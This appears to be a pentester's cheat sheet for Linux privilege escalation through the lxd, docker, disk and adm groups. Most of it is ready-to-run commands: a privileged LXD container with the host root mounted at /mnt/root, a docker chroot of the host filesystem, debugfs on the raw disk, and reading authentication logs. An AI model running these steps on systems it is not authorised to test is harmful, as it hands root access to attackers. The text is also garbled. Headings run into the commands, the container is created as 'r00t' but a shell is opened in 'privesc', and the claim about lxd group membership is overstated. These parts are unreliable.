LXC / LXD
LXD is similar to Docker and is Ubuntu's container manager. Upon installation, all users are added to the LXD group. Membership of this group can be used to escalate privileges by creating an LXD container, making it privileged, and then accessing the host file system at /mnt/root
devops@NIX02:~$ id
uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)Unzip the Alpine image → A minimal Docker image based on Alpine Linux.
unzip alpine.zip
#output
Archive: alpine.zip
extracting: 64-bit Alpine/alpine.tar.gz
inflating: 64-bit Alpine/alpine.tar.gz.root
cd 64-bit\ AlpineImport the local image.
lxc image import alpine-v3.18-x86_64-20230607_1234.tar.gz --alias alpine
lxc image listStart a privileged container with the security.privileged set to true to run the container without a UID mapping, making the root user in the container the same as the root user on the host.
lxc init alpine r00t -c security.privileged=trueMount the host file system.
lxc config device add r00t host-root disk source=/ path=/mnt/root recursive=truespawn a shell inside the container instance
lxc start r00t
lxc exec privesc /bin/bash
lxc exec privesc /bin/sh
# try **sh** shell because alpine is light Docker
discover groups
id
uid=1001(user) gid=1001(user) groups=1001(user),**999(docker)**which meaning u can run docker with any privilege like the root user
# exploit
docker run -v /:/mnt --rm -it ubuntu chroot /mntDisk
if user found in disk group that’s meaning this user can write on any system disks like /dev/sda1
id
groups=1001(user),6(disk# exploit
sudo debugfs /dev/sda1ADM
if user found in Adm group that’s meaning this user can read logs on the system /var/log
id
groups=1001(user),4(adm)cat /var/log/auth.log
cat /var/log/cron.log